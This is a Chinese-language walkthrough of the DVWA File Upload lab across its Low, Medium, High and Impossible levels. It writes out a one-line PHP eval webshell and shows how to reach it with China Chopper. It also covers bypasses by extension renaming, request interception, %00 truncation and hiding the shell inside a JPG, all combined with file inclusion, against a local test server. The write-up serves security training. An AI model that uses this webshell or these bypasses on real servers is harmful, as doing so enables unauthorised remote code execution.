DVWA---全级别File Upload

File Upload

通常是由于对上传文件的类型、内容没有进行严格的过滤和检查，使得攻击者可以通过上传木马获取服务器的webshell权限，因此文件上传漏洞带来的危害常常是毁灭性的，Apache、Tomcat、Nginx等都曝出过文件上传漏洞。

Low：

首先查看服务器端核心代码：

相关函数介绍：

basename(path,suffix) 

函数返回路径中的文件名部分，如果可选参数suffix为空，则返回的文件名包含后缀名，反之不包含后缀名。

服务器对上传文件的类型、内容没有做任何的检查、过滤，存在明显的文件上传漏洞，生成上传路径后，服务器会检查是否上传成功并返回相应提示信息。

漏洞利用：

利用文件上传漏洞的条件：

1.能够成功上传木马文件

2.上传文件必须能够被执行

3.上传文件的路径必须可知

这里三个条件都满足。

上传文件jie.php(一句话木马)

新建一个文本文档，在其中写入代码<?php@eval($_POST['junjie']);?>，保存退出。

上传成功，并且返回了上传路径

打开中国菜刀，右键添加，地址栏填入上传文件所在路径http://192.168.18.21/DVWA-master/hackable/uploads/jie.php，参数名(一句话木马口令)为junjie。

然后菜刀就会通过向服务器发送包含junjie参数的post请求，在服务器上执行任意命令，获取webshell权限。

Medium：

首先查看服务器端核心代码：

Medium级别的代码对上传文件的类型、大小做了限制，要求文件类型必须是jpeg或者png，大小不能超过100000B(约为97.6KB)。

漏洞利用：

1.文件包含+文件上传

因为采用的是一句话木马，所以文件大小不会有问题，至于文件类型的检查，尝试修改文件名为junjie.png。

上传成功。

 

打开中国菜刀。

虽然成功上传了文件，但是并不能成功获取webshell权限，在菜刀上无论进行什么操作都会返回如下信息。

中国菜刀的原理：向上传文件发送包含junjie参数的post请求，通过控制junjie参数来执行不同的命令

这里服务器将木马文件解析成了图片文件，因此向其发送post请求时，服务器只会返回这个“图片”文件，并不会执行相应命令。

文件包含漏洞可以让服务器将其解析为php文件来获取webshell权限。

打开中国菜刀，右键添加，在地址栏中输入

http://192.168.18.21/DVWA-master/vulnerabilities/fi/?page=hthttp://192.168.18.21/DVWA-master/hackable/uploads/jie.png

参数名为junjie，脚本语言选择php。

点击添加，成功获取webshell权限。

2.抓包修改文件类型

上传hack.png文件，抓包。

文件类型为image/png，尝试修改filename为hack.php。

上传成功。

打开菜刀，成功获取webshell权限。

3.截断绕过规则

在php版本小于5.3.4的服务器中，当Magic_quote_gpc选项为off时，可以在文件名中使用%00截断，所以可以把上传文件命名为junjie.php%00.png。

抓到的包中的文件类型为image/png，可以通过文件类型检查。

上传成功。

服务器会认为其文件名为hack.php，顺势解析为php文件。

由于本次实验环境的php版本为5.6.27，所以无法进行验证。

High：

首先查看服务器端核心代码：

相关函数介绍：

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置，如果没有找到字符串则返回false，可选参数start规定在何处开始搜索。

getimagesize(string filename)

函数会通过读取文件头，返回图片的长、宽等信息，如果没有相关的图片文件头，函数会报错。

High级别的代码读取文件名中最后一个”.”后的字符串，期望通过文件名来限制文件类型，因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一。

同时，getimagesize函数更是限制了上传文件的文件头必须为图像类型。

漏洞利用：

采用%00截断的方法可以轻松绕过文件名的检查，但是需要将上传文件的文件头伪装成图片，由于实验环境的php版本原因，这里只演示如何借助High级别的文件包含漏洞来完成攻击。

首先利用copy将一句话木马文件php.php与图片文件1.jpg合并

一定要先cd到桌面再敲命令。

生成文件junjie.jpg。

打开可以看到，一句话木马藏到了最后。

修改文件后缀为png。

顺利通过文件头检查，成功上传。

打开菜刀，右键添加shell，地址栏填入

http://192.168.18.21/DVWA-master/vulnerabilities/fi/?page=file://C:/phpStudy/PHPTutorial/WWW/DVWA-master/hackable/uploads/jie.png

参数名填junjie，脚本语言选择php。

成功拿到webshell。

Impossible：

首先查看服务器端核心代码：

相关函数介绍：

in_get(varname)

函数返回相应选项的值

imagecreatefromjpeg (filename)

函数返回图片文件的图像标识，失败返回false

imagejpeg (image,filename,quality)

从image图像以filename为文件名创建一个JPEG图像，可选参数quality，范围从0(最差质量，文件更小)到100(最佳质量，文件最大)

imagedestroy(img)

函数销毁图像资源

Impossible级别的代码对上传文件进行了重命名(为md5值，导致%00截断无法绕过过滤规则)，加入Anti-CSRF token防护CSRF攻击，同时对文件的内容作了严格的检查，导致攻击者无法上传含有恶意脚本的文件。